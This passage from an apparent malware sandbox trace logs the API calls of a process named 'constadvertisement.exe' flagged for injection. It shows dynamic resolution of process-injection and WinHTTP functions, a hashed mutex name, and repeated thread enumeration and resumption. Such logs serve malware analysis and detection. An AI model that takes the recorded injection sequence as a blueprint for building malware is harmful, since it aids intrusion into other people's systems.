(hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.524] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.524] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.524] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.525] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.525] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.525] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.526] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.526] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.526] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.526] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.527] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.527] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.527] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.527] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.528] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.528] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.528] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.529] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.529] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.529] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.529] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.530] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.530] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.530] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.530] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.531] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.531] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.531] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.531] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.532] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.532] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.532] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.533] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.533] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.533] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.533] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.534] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.534] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.534] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.534] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.535] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.535] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.535] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.536] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.536] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.536] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.536] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.537] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.541] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.541] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.541] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.542] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.542] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.542] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.542] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.543] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.543] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.543] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.544] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.544] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.544] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.544] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.545] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.545] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.545] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.545] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.546] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.546] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.546] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.547] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.547] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.547] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.547] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.548] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.548] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.548] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.548] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.549] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.549] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.549] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.550] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.550] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.550] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.590] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7ec) returned 0x124 [0178.590] ResumeThread (hThread=0x124) returned 0x1 [0178.590] CloseHandle (hObject=0x124) returned 1 [0178.591] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4a0) returned 0x124 [0178.591] ResumeThread (hThread=0x124) returned 0x1 [0178.591] CloseHandle (hObject=0x124) returned 1 [0178.591] CloseHandle (hObject=0x11c) returned 1 [0178.591] VirtualQuery (in: lpAddress=0x1d55f38, lpBuffer=0x406ff3c, dwLength=0x1c | out: lpBuffer=0x406ff3c*(BaseAddress=0x1d55000, AllocationBase=0x1d30000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.591] GetProcessHeap () returned 0x1d30000 [0178.591] HeapFree (in: hHeap=0x1d30000, dwFlags=0x0, lpMem=0x1d55f38 | out: hHeap=0x1d30000) returned 1 [0178.591] VirtualQuery (in: lpAddress=0x1d51678, lpBuffer=0x406ff3c, dwLength=0x1c | out: lpBuffer=0x406ff3c*(BaseAddress=0x1d51000, AllocationBase=0x1d30000, AllocationProtect=0x4, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.591] GetProcessHeap () returned 0x1d30000 [0178.591] HeapFree (in: hHeap=0x1d30000, dwFlags=0x0, lpMem=0x1d51678 | out: hHeap=0x1d30000) returned 1 [0178.591] RtlExitUserThread (Status=0x0) Process: id = "39" image_name = "constadvertisement.exe" filename = "c:\\program files (x86)\\windows sidebar\\constadvertisement.exe" page_root = "0x65e9b000" os_pid = "0x7d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\constadvertisement.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 286 os_tid = 0x994 Thread: id = 287 os_tid = 0x184 Thread: id = 288 os_tid = 0x5f0 [0174.327] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0174.328] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0174.329] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0174.330] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0174.331] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0174.331] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0174.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0174.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0174.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0174.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0174.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0174.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0174.331] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0174.337] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0174.337] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0174.337] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0174.341] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0174.341] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0174.341] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0174.341] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0174.341] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0174.341] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0174.341] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0174.341] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0174.341] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0174.342] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0174.342] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0174.342] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0174.344] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0174.344] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0174.344] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0174.344] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0174.344] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0174.344] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0174.345] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0174.345] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0174.345] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0174.345] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0174.345] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0174.345] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0174.345] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0174.345] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0174.345] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0174.345] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0174.345] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0xf4fc00 | out: lpflOldProtect=0xf4fc00*=0x40) returned 1 [0174.346] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0xf4fc00 | out: lpflOldProtect=0xf4fc00*=0x4) returned 1 [0174.346] VirtualQuery (in: lpAddress=0xf0016, lpBuffer=0xf4fbf8, dwLength=0x1c | out: lpBuffer=0xf4fbf8*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0174.346] GetProcessHeap () returned 0x7f0000 [0174.346] RtlAllocateHeap (HeapHandle=0x7f0000, Flags=0x8, Size=0x364) returned 0x810580 [0174.346] RtlMoveMemory (in: Destination=0x810580, Source=0xf0016, Length=0x363 | out: Destination=0x810580) [0174.346] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xf0016) returned 0x0 [0174.347] GetCurrentProcessId () returned 0x7d8 [0174.347] GetProcessHeap () returned 0x7f0000 [0174.347] RtlAllocateHeap (HeapHandle=0x7f0000, Flags=0x8, Size=0x105) returned 0x8108f0 [0174.347] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8108f0, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\constadvertisement.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\constadvertisement.exe")) returned 0x3d [0174.347] GetProcessHeap () returned 0x7f0000 [0174.347] RtlAllocateHeap (HeapHandle=0x7f0000, Flags=0x8, Size=0x105) returned 0x810a00 [0174.347] GetCurrentProcessId () returned 0x7d8 [0174.347] wsprintfA (in: param_1=0x810a00, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\constadvertisement.exe37084212420083") returned 75 [0174.347] CryptAcquireContextA (in: phProv=0xf4fbfc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xf4fbfc*=0x810b50) returned 1 [0174.443] CryptCreateHash (in: hProv=0x810b50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xf4fc00 | out: phHash=0xf4fc00) returned 1 [0174.443] lstrlenA (lpString="C:\\Program Files (x86)\\Windows Sidebar\\constadvertisement.exe37084212420083") returned 75 [0174.443] CryptHashData (hHash=0x811460, pbData=0x810a00, dwDataLen=0x4b, dwFlags=0x0) returned 1 [0174.443] CryptGetHashParam (in: hHash=0x811460, dwParam=0x2, pbData=0xf4fbec, pdwDataLen=0xf4fc04, dwFlags=0x0 | out: pbData=0xf4fbec, pdwDataLen=0xf4fc04) returned 1 [0174.443] wsprintfA (in: param_1=0x810a00, param_2="%02X" | out: param_1="EF") returned 2 [0174.443] wsprintfA (in: param_1=0x810a02, param_2="%02X" | out: param_1="53") returned 2 [0174.443] wsprintfA (in: param_1=0x810a04, param_2="%02X" | out: param_1="F8") returned 2 [0174.443] wsprintfA (in: param_1=0x810a06, param_2="%02X" | out: param_1="44") returned 2 [0174.443] wsprintfA (in: param_1=0x810a08, param_2="%02X" | out: param_1="64") returned 2 [0174.443] wsprintfA (in: param_1=0x810a0a, param_2="%02X" | out: param_1="36") returned 2 [0174.443] wsprintfA (in: param_1=0x810a0c, param_2="%02X" | out: param_1="29") returned 2 [0174.443] wsprintfA (in: param_1=0x810a0e, param_2="%02X" | out: param_1="B4") returned 2 [0174.443] wsprintfA (in: param_1=0x810a10, param_2="%02X" | out: param_1="0C") returned 2 [0174.443] wsprintfA (in: param_1=0x810a12, param_2="%02X" | out: param_1="03") returned 2 [0174.443] wsprintfA (in: param_1=0x810a14, param_2="%02X" | out: param_1="B7") returned 2 [0174.444] wsprintfA (in: param_1=0x810a16, param_2="%02X" | out: param_1="E2") returned 2 [0174.444] wsprintfA (in: param_1=0x810a18, param_2="%02X" | out: param_1="D0") returned 2 [0174.444] wsprintfA (in: param_1=0x810a1a, param_2="%02X" | out: param_1="11") returned 2 [0174.444] wsprintfA (in: param_1=0x810a1c, param_2="%02X" | out: param_1="29") returned 2 [0174.444] wsprintfA (in: param_1=0x810a1e, param_2="%02X" | out: param_1="95") returned 2 [0174.444] CryptDestroyHash (hHash=0x811460) returned 1 [0174.444] CryptReleaseContext (hProv=0x810b50, dwFlags=0x0) returned 1 [0174.444] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="EF53F844643629B40C03B7E2D0112995") returned 0x80 [0174.444] GetLastError () returned 0x0 [0174.444] Sleep (dwMilliseconds=0x1f4) [0175.041] GetCurrentProcessId () returned 0x7d8 [0175.041] GetCurrentThreadId () returned 0x5f0 [0175.041] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0175.044] Thread32First (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.045] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.045] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.045] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.045] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.046] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.046] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.046] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.046] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.047] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.047] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.047] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.048] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.048] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.048] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.048] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.049] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.049] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.049] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.049] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.050] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.050] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.050] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.051] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.051] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.051] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.051] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.052] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.052] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.052] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.052] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.053] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.053] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.053] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.054] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.054] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.054] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.054] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.055] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.055] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.055] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.055] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.056] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.056] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.056] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.057] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.057] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.057] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.057] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.058] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.058] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.058] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.059] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.059] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.059] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.059] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.060] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.060] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.060] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.060] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.061] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.061] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.061] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.062] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.062] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.062] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.062] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.063] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.063] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.063] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.063] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.064] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.064] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.064] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.065] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.065] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.065] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.065] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.066] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.066] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.066] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.066] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.067] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.067] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.067] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.068] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.068] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.068] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.068] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.069] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.069] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.069] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 [0175.069] Thread32Next (hSnapshot=0x88, lpte=0xf4fbf0) returned 1 